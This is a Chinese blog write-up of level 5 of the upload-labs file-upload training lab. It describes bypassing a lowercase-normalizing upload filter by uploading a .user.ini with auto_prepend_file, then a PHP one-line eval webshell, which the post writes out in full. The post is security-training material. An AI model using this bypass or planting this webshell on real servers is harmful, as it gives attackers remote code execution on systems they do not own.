upload-labs关卡记录5

这一关,卡了好久,这里我的靶场的源代码,和我看别的师傅发的不一样,我的这里的源码带有小写转换:

是不能通过大小写进行绕过,最后找到这个师傅的文章:upload-labs通关-CSDN博客

这里第五关用到的方法,可以进行绕过,原理师傅讲的也很清晰,原理类似于之前的.htaccess绕过,通过添加配置文件。然后再上传一句话木马来进行实现:

就是将这里的代码:auto_prepend_file=1.txt

写进命名为.user.ini的文件中,然后上传这个文件,然后再上传命名为1.txt的文件。这时进入url为:upload-labs:8899/upload/readme.php

然后再使用hackbar来执行刚才上传的一句话木马,就是写进1.txt的一句话木马。

我这里的一句话木马为:<?php @eval($_POST['pw']); ?>

相关推荐
不会写DN1 小时前
PHP 中的文件读写与上传
android·开发语言·php
hangbobo5 小时前
宝塔面板 PHP 7.4 安装 swoole_loader 解密扩展
php·swoole·宝塔面板
xingxin326 小时前
PHP代码分析溯源(第3题)
安全·web安全·网络安全·php
LlNingyu6 小时前
文艺复兴,什么是CSRF,常见形式(一)
前端·安全·web安全·csrf
桌面运维家7 小时前
BGP路由优化实战:加速收敛,提升网络稳定性
网络·windows·php
m0_738120729 小时前
我的创作纪念日0328
java·网络·windows·python·web安全·php
未来转换9 小时前
计算机网络基础之IP地址详解
tcp/ip·计算机网络·php
百度智能云技术站10 小时前
ClawHub 漏洞警示:官方商店失守,百度智能云守护小龙虾 Skill 供应链安全
网络·安全·web安全
Leventure_轩先生11 小时前
[RL]强化学习指导搭建IC2E核反应堆
开发语言·php
李彦亮老师(本人)11 小时前
网络安全基础:TCP/IP 协议栈安全分析与防护
tcp/ip·安全·web安全